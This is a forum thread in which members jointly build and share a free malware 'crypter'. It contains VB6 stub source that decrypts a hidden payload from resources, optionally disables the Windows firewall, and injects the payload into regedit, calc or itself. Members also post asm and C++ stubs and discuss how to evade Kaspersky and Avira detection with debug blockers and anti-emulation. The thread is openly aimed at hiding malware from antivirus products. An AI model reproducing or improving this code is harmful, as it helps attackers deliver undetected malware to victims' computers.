38 replies to this topic

[Neelix]

Seeking some ppl that may wanna help me to build a crypter.

The special thing is builder will be written in vb6 (by me), and stubs should be written in c, or c++, delphi, asm.

 

The idea is to build an open source crypter for everyone 100 % free of charge. A peace of quality 

cause it uses high level language for stub.

 

Something like Broad Crypter just 4 free.

 

So if u are think i have to be part of this write in this topic what u could do / code.

 

Will be a lot of fun i guess ;D

[cob_258]

I can help with asm stub

[Simon-Benyo]

i can provide some c++ - asm support

[Neelix]

 

Infos : Builder / Stub Source written in Vb6

 

- Iconchanger

- Cloner

- Eof

- Firewall

 

4 custom injections

 

Crypter uses RES in Builder and Loadressourcedata in stub

 

Encryption is a modded rc4

 

 

main module stub

 

 

Quote

Option Explicit

Sub Main()

 

Dim RootByte() As Byte, RootOptions As String

 

RootByte = LoadResData(45, 15) ' File

RootOptions = StrConv(LoadResData(80, 60), vbUnicode) ' Options

 

Call RootDecrypt(RootByte, "KörperVolumen") ' Cryptkey

 

If Mid$(RootOptions, 1, 1) = 1 Then Call sDisableWall

If Mid$(RootOptions, 2, 1) = 1 Then Call RootPE(GetFilePath, RootByte)                              ' thixexe

If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\regedit.exe", RootByte)       ' regedit

If Mid$(RootOptions, 4, 1) = 1 Then Call RootPE(Environ("windir") & "\Updreg.exe", RootByte)        ' updreg

If Mid$(RootOptions, 5, 1) = 1 Then Call RootPE(Environ("windir") & "\system32" & "\calc.exe", RootByte) ' calc

 

End Sub

 

Function GetFilePath() As String

Dim Platz(512) As Byte

Call RootInvoke("kernel32", "GetModuleFileNameW", 0, VarPtr(Platz(0)), 512)

GetFilePath = Platz

End Function

 

 

Encryption

Quote

Public Sub RootDecrypt(ByRef ByteArray() As Byte, ByVal sKey As String)

  Const MagicByte As Byte = &HEE

  Dim PwdLen As Long

  Dim PwdAsc As Byte

  Dim i As Long

  Dim j As Long

  Dim LB As Long

  Dim UB As Long

  

    PwdLen = Len(sKey)

    LB = LBound(ByteArray)

    UB = UBound(ByteArray)

    

    For j = 1 To PwdLen

    

      PwdAsc = Asc(Mid$(sKey, j, 1)) Xor MagicByte

      For i = LB To UB Step PwdLen

        ByteArray(i) = ByteArray(i) Xor PwdAsc Xor (i And &HEE)

      Next i

      LB = LB + 1

    

    Next j

 

End Sub

Quote

 

Full Source attached well documenmted, if there are any questions open pls ask.

 

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  18.83KB   141 downloads

[cob_258]

Quote

Call RootDecrypt(RootByte, "KörperVolumen") ' Cryptkey

A unique key for each crypt would be better, don't you think?

[Neelix]

I could implement that easily will upload new one 

[Neelix]

Quote

Option Explicit

Sub Main()

 

Dim RootByte() As Byte, RootOptions As String, RootKey As String

 

RootByte = LoadResData(45, 15)

RootOptions = StrConv(LoadResData(80, 60), vbUnicode)

RootKey = StrConv(LoadResData(120, 100), vbUnicode)

 

Call RootDecrypt(RootByte, RootKey) ' Cryptkey

 

If Mid$(RootOptions, 1, 1) = 1 Then Call sDisableWall

If Mid$(RootOptions, 2, 1) = 1 Then Call RootPE(GetFilePath, RootByte)                              ' thixexe

If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\regedit.exe", RootByte)       ' regedit

If Mid$(RootOptions, 4, 1) = 1 Then Call RootPE(Environ("windir") & "\Updreg.exe", RootByte)        ' updreg

If Mid$(RootOptions, 5, 1) = 1 Then Call RootPE(Environ("windir") & "\system32" & "\calc.exe", RootByte) ' calc

 

End Sub

 

Function GetFilePath() As String

Dim Platz(512) As Byte

Call RootInvoke("kernel32", "GetModuleFileNameW", 0, VarPtr(Platz(0)), 512)

GetFilePath = Platz

End Function

 

Now its done new builder and stub source attached

 

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  18.93KB   91 downloads

[cob_258]

This is my asm stub, regedit injection is detected by kaspersky heur (can be bypassed with anti emulator)

 

 

Quote

TODO :
- fix DisableWall (problem with RegOpenKeyW)
- Update to unique password

 

 

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  3.16KB   76 downloads

[cob_258]

update

Quote

27.12.2012
+ updated to unique password (line commented to be compatible with the old builder)
+ added debug blocker, bypassed heur detection of KAV when injected in regedit

TODO :
- fix DisableWall

 

scans

Quote

Please Login or Register to see this Hidden Content

Please Login or Register to see this Hidden Content

 

 

 

avira detects crypted file because of resource section size, any idea of how to avoid that?


* bugs in builder :

Quote

- crash if failed to overwrite the crypted file
- when you press crypt then you cancel it writes the crypted file

 

Download

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  6.71KB   51 downloads

[Neelix]

Just figured it out other res method wont help you too but i can make an EOF Builder if you want currently working on Matrix may pm me ur msn ?

[cob_258]

Asm stub updated (04.02.2013)

Quote

! DisableFireWall fixed by using 'netsh' (code from '

Please Login or Register to see this Hidden Content

')

 

Please Login or Register to see this Hidden Content

(10 / 34 )

ps: I will be absent for one or two weeks (because of my exams), feel free to modifiy the stub

[Neelix]

 u forget to upload ur fixed asm stub source m8, but iam on ur previous one reading some tuts about manual packing now and installed masm. hope there are some ppl that code a c++ and delphi stub too.

[DualCoder]

Here is a C++ stub I wrote for this crypter.

 

It uses T4 Code Generation to encrypt some strings, so you will need to point the Pre-Build Event to "TextTransform.exe" or remove it completly.

I think the stub is quite stable but I haven't tested it verry well.

And there is no Firewall bypass in it yet.

 

Please Login or Register to see this Hidden Content

 

Source code is attached.

Attached Files

•  Matrix Stub.zip   10.86KB   71 downloads

[Neelix]

Please Login or Register to see this Hidden Content

 Dualcoder great we have a c++ coder + rep

[roller]

I need the compiled this files crypt.

Please man ;p

[Neelix]

learn how to compile them if you cant solve it by ur own (google) may go back to hf.

also this topic is for members that working on the project, not a topic that explains how to compile a crypter.

 

so if you want use it find out how.

[kevox2]

good luck for u project!

[0xM3N]

good work bro , thanks d: 

[cob_258]

I forgot to upload the stub

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  7.55KB   73 downloads

[true22]

This is super awesome! gud job guys keep up this great job